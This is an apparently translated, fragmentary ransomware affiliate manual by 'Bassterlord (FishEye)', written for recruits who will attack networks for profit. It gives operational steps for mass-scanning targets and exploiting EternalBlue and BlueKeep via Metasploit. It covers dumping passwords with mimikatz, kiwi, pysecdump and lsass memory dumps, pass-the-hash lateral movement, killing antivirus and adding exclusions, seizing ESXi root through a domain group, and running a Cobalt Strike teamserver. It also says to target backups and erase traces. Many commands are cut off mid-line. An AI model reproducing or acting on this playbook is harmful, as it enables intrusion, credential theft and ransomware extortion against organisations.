Networking Manual by Bassterlord (Fisheye)
Networking Manual by Bassterlord (Fisheye)
Networking Manual by Bassterlord (Fisheye)
Networking manual
by Bassterlord (FishEye)
But above all, for the people who will work for me.
4. Any Windows 10
6. MimicTYTS
9. PysecdumpTYTS
10. PsexecTYTS
14. MetasploitTYTS
15. Bluekeep exploit for 3389 under Windows (located nearby in the archive)
19. VeracryptTYTS
We start the virtual machine, enter the login kali password kali
enter the kali password and press enter (passwords in kali are not displayed in the
console, you must enter in the blind)
Next, enter
cd pack
We install everything according to the list from the screen with all the default settings.
We put a python
We enter commands
We buy an account of your choice and scan the whole world for popular
HTTPS ports example below:
Let's go to cali
git clone
cd Fortigate
This will be our material for work, copy our valid to a virtual machine with
Windows and see the next section.
RANSOMWARE = Terrorism
All your actions that you will perform
further you do at your own peril and
However, this risk brings millions!
I'm not promoting ransom it's just mans by
Beginning of work
First of all, we go into our virtual machine under Windows
We see the following picture and pay attention to the interface and
netmask: - - - -
If we see - -
If you are using the paid version of the scanner, then you will have a field
nmap integration
Put a tick on the ethernal and start scanning
DB mysql,mssql,db2,postgresql: 3306,1433,50000,5432,5433 -
Oracle: 1521,1522
Nfs: 111,1039,1047,1048,2049
Iscsi: 860.3260
replication: 902,31031,8123,8043,5480,5722
After loading the metasploit, enter the following commands one by one:
set SessionCommunicationTimeout 0
Next, we wait for the process to complete and watch active sessions
load kiwi
Next, enter creds_all - this command will try to pull out not
encrypted passwords from the system
We also copy them into a separate text document.
If there are red disks everywhere in the domain, this means that we have received
the administrator's domain on the network and we have rights everywhere
to read and modify data on a remote machine.
If only on several machines, then only the rights of local
administrators and you should look for other accounts
net group
Also Impacket unpacked along the wayc:\impacket with the one already in it
Also place a .cmd file with the following content on the desktop
We will rewrite it and launch it for the purposes we need on the network.
We sort by user accounts and substitute the necessary
us the values up to the first point as in the screenshot below
Sometimes DCs do not give themselves away and it is necessary to scan all
machines in the domain (workgroup) with this exploit, but this pays off.
cd impacket/examples
We press enter we will be asked to enter the password, enter into the blind kali and press enter
(remember that in Kali the entered password is not displayed for this in the blind)
We return to Kali.
enter cd impacket/examples
After that, we get our account with domain administrator rights and
accordingly, we can break into all machines on the domain by account:
support Pa$$wo0rd
Next, we go to DC and remove the credits from the domain admins mimic 64.exe or 32.exe
power tool
If we find, we look at all the subfolders that are in the folder with av, our goal is to find
the folders and values \u200b\u200bwithin them called Exclusions (exceptions)
Ideally, you need to kill av wherever possible and add disks to exceptions
and backups
Veeam: 9443,9392,9393,9401,6160
Usually we hang outside the domain first of all we look at the scan if we
have access to them from a regular scan with accounts admin domain all
However, if we are in a workgroup, you can break through all the domain of admins and
try to log in to them using credits without a domain from broken accounts through a web
interface by opening the IP of us through a browser and specifying the port of us
through a colon.
If they do not fit, we take the Administrator account and its password.
Log in to us as Admin with the same password or sort through passwords from
other domain admins, the probability of a breakdown increases.
If we opened the network through PASS THE HASH, we look for these accounts in the
results of the received hashes and get passwords from them through the hacking service
And the most important thing at the stage Kh..ka we need to start with disks and computers
where is the most memory in 500 gigs or more
Accordingly, the most important and the first will be ideally screwed
"big data"
V C and ESXI
This section will conduct a great and
In my work, I often face the task of resetting the root password on esx.
Let's imagine the situation we have administrator credits vcenter has a domain
admin and the whole network is ready to fuck, but it was not possible to catch the password under
esx is one way.
This method is that we will enter esx into the domain and we will be able to
log in with domain admin credentials
And we create a global group ESX Admins there, be sure to include it there
your domain admin.
Select the esx host, click configure - Autentication Service - Join domain, enter the
domain in the format domain.local or which domain can be
find out by entering systeminfo on a computer in the domain
enter the admin domain login without a domain and its password. now everything is ready for
authorization, go to the esx host using domain admin credits and
reset root pass
Through Psexec, you can receive and withdraw credits from remote computers if
they do not have 3389 ports, but we have an account.
Through the scanner, open the C$ folder and throw pysecdump.exe there
and procdump.exe
So we got into the car doing
pysecdump.exe -s
This command will give us the hashes of the admin on the remote computer, we
are trying to break through the site or use PASS THE HASH in Kali on others
Next do
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
Next, you can try to remotely enable the RDP port with the command
After all, do not forget to delete all files and traces of work on the remote
After all the steps, if you want to minimally erase the traces of your
stay and postpone break-in.
On the machines that you entered via RDP, you can open a powershell
do in console
cd cs4.0
java -XX:ParallelGCThreads=4 -
Dcobaltstrike.server_port=50050 - - -server -XX:
+ AggressiveHeap -XX:+UseParallelGC -
javaagent:Hook.jar -classpath ./cobaltstrike.jar
server.TeamServer SERVAK IP 12345
Let's go to my car, I work from Windows in Kobe
We create a listener.
Next do
We do it there
Next we go to
We select all the cars in the network and try to break into
them by admin hash.
It is worth mentioning that cars do not always go out in
general internet.
Then we do
I do not argue that there are people smarter than me and with much whiter